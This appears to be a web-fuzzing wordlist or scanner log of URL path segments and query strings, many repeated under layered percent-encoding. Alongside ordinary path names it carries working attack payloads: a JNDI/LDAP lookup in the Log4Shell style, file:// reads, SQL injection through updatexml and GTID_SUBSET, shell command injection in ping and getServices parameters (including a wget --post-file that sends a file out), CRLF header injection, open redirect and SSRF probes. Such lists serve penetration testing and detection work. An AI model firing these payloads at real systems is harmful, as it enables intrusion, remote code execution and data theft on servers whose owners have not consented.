2yNhrXevCZSEYbV7XSlUISg5y7D
35610LbYpVeIdPaI3N5gA5uU0Jw
356130G9DiZSq8tLwoOsBetLSzs
Business
Config/
Event/
Home/
Index/
Notify
ShareMgnt/
Web.Config
account/
add-article-by-text
agent/
app/
appVersion%252525252525253Fmobile_system=2
appVersion%2525252525253Fmobile_system=2
appVersion%25252525253Fmobile_system=2
appVersion%252525253Fmobile_system=2
appVersion%2525253Fmobile_system=2
appVersion%25253Fmobile_system=2
appVersion%253Fmobile_system=2
appVersion%3Fmobile_system=2
appVersion?mobile_system=2
apps/
auth/
auth:signIn
authenticate
authentication/
banner%252525252525253FappKey=bxefdn
banner%2525252525253FappKey=bxefdn
banner%25252525253FappKey=bxefdn
banner%252525253FappKey=bxefdn
banner%2525253FappKey=bxefdn
banner%25253FappKey=bxefdn
banner%253FappKey=bxefdn
banner%3FappKey=bxefdn
banner?appKey=bxefdn
baseConfig
blade-user/
c/
chat/
clusters
common/
components/
config
content
cors/
currency/
data
dbstat/
dns
dp/
edr/
etc/
experimental/
fabric/
file/
front/
gen/
geojson%252525253Furl=file:
geojson%2525253Furl=$%2525257Bjndi:ldap:
geojson%2525253Furl=file:
geojson%25253Furl=$%25257Bjndi:ldap:
geojson%25253Furl=file:
geojson%253Furl=$%257Bjndi:ldap:
geojson%253Furl=file:
geojson%3Furl=$%7Bjndi:ldap:
geojson%3Furl=file:
geojson?url=${jndi:ldap:/
geojson?url=file:/
get-browser-snapshot%252525253Fsnapshot_path=
get-browser-snapshot%2525253Fsnapshot_path=
get-browser-snapshot%25253Fsnapshot_path=
get-browser-snapshot%253Fsnapshot_path=
get-browser-snapshot%3Fsnapshot_path=
get-browser-snapshot?snapshot_path=/
get-organizations%2525253Fp=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml%252525281,version%25252528%25252529,1%25252529
get-organizations%25253Fp=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml%2525281,version%252528%252529,1%252529
get-organizations%253Fp=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml%25281,version%2528%2529,1%2529
get-organizations%3Fp=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml%281,version%28%29,1%29
get-organizations?p=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml(1,version(),1)
get-users%252525253Fp=123&pageSize=123
get-users%2525253Fp=123&pageSize=123
get-users%25253Fp=123&pageSize=123
get-users%253Fp=123&pageSize=123
get-users%3Fp=123&pageSize=123
get-users?p=123&pageSize=123
getServices%2525253Fname%2525255B%2525255D=$%25252528wget%2525252520--post-file%2525252520
getServices%25253Fname%25255B%25255D=$%252528wget%25252520--post-file%25252520
getServices%253Fname%255B%255D=$%2528wget%252520--post-file%252520
getServices%3Fname%5B%5D=$%28wget%2520--post-file%2520
getServices?name[]=$(wget%20--post-file%20/
get_device_details
gql
graphql
group/
im/
imageProxy%252525253Furl=https:
imageProxy%2525253Furl=https:
imageProxy%25253Furl=https:
imageProxy%253Furl=https:
imageProxy%3Furl=https:
imageProxy?url=https:/
index/
jmeter/
jobs
json/
jsonrpc
jsonws/
kernels
login
logout%252525253Fredirect_to=%25252525250d%25252525250aSet-Cookie:crlfinjection=1
logout%2525253Fredirect_to=%252525250d%252525250aSet-Cookie:crlfinjection=1
logout%2525253Fredirect_to=%252525250d%252525250aSet-Cookie:crlfinjection=1;
logout%2525253Fredirect_to=http:
logout%25253Fredirect_to=%2525250d%2525250aSet-Cookie:crlfinjection=1
logout%25253Fredirect_to=%2525250d%2525250aSet-Cookie:crlfinjection=1;
logout%25253Fredirect_to=http:
logout%253Fredirect_to=%25250d%25250aSet-Cookie:crlfinjection=1
logout%253Fredirect_to=%25250d%25250aSet-Cookie:crlfinjection=1;
logout%253Fredirect_to=http:
logout%3Fredirect_to=%250d%250aSet-Cookie:crlfinjection=1
logout%3Fredirect_to=%250d%250aSet-Cookie:crlfinjection=1;
logout%3Fredirect_to=http:
logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;
logout?redirect_to=http:/
manager/
message/
metrics
model_report/
module%2525253Ftype=%252525253C
module%25253Ftype=%2525253C
module%253Ftype=%25253C
module%3Ftype=%253C
module?type=%3C/
moduleInformation
notice
operator
other/
ping
ping%2525253Fcount=5&host=;cat%2525252520
ping%25253Fcount=5&host=;cat%25252520
ping%253Fcount=5&host=;cat%252520
ping%3Fcount=5&host=;cat%2520
ping?count=5&host=;cat%20/
portalTsLogin/
presets/
product/
products%2525253Flimit=20&priceOrder&salesOrder&selectId=GTID_SUBSET%25252528CONCAT%252525280x7e,%25252528SELECT+%25252528ELT%252525283550=3550,md5%252525289881957%25252529%25252529%25252529%25252529,0x7e%25252529,3550%25252529
products%25253Flimit=20&priceOrder&salesOrder&selectId=GTID_SUBSET%252528CONCAT%2525280x7e,%252528SELECT+%252528ELT%2525283550=3550,md5%2525289881957%252529%252529%252529%252529,0x7e%252529,3550%252529
products%253Flimit=20&priceOrder&salesOrder&selectId=GTID_SUBSET%2528CONCAT%25280x7e,%2528SELECT+%2528ELT%25283550=3550,md5%25289086287%2529%2529%2529%2529,0x7e%2529,3550%2529
products%253Flimit=20&priceOrder&salesOrder&selectId=GTID_SUBSET%2528CONCAT%25280x7e,%2528SELECT+%2528ELT%25283550=3550,md5%25289881957%2529%2529%2529%2529,0x7e%2529,3550%2529
products%3Flimit=20&priceOrder&salesOrder&selectId=GTID_SUBSET%28CONCAT%280x7e,%28SELECT+%28ELT%283550=3550,md5%289086287%29%29%29%29,0x7e%29,3550%29
products%3Flimit=20&priceOrder&salesOrder&selectId=GTID_SUBSET%28CONCAT%280x7e,%28SELECT+%28ELT%283550=3550,md5%289881957%29%29%29%29,0x7e%29,3550%29
products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9086287)))),0x7e),3550)
products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9881957)))),0x7e),3550)
profile
proxy/
pull
push
remote
remotefollow
router/
runscript
scrape/
search/
security/
server/
session/
sessions
setinfo
settings/
setup/
setup-complete
shares/
shop/
snapshots
sonicos/
sso/
stats
subscriber
sys/
system/
terminals
timelion/
tokens
toktime/
uploads/
user/
userrolelist/
users
v0/
v1/
v2/
v3/
v4/
v5/
version
vue/
whoami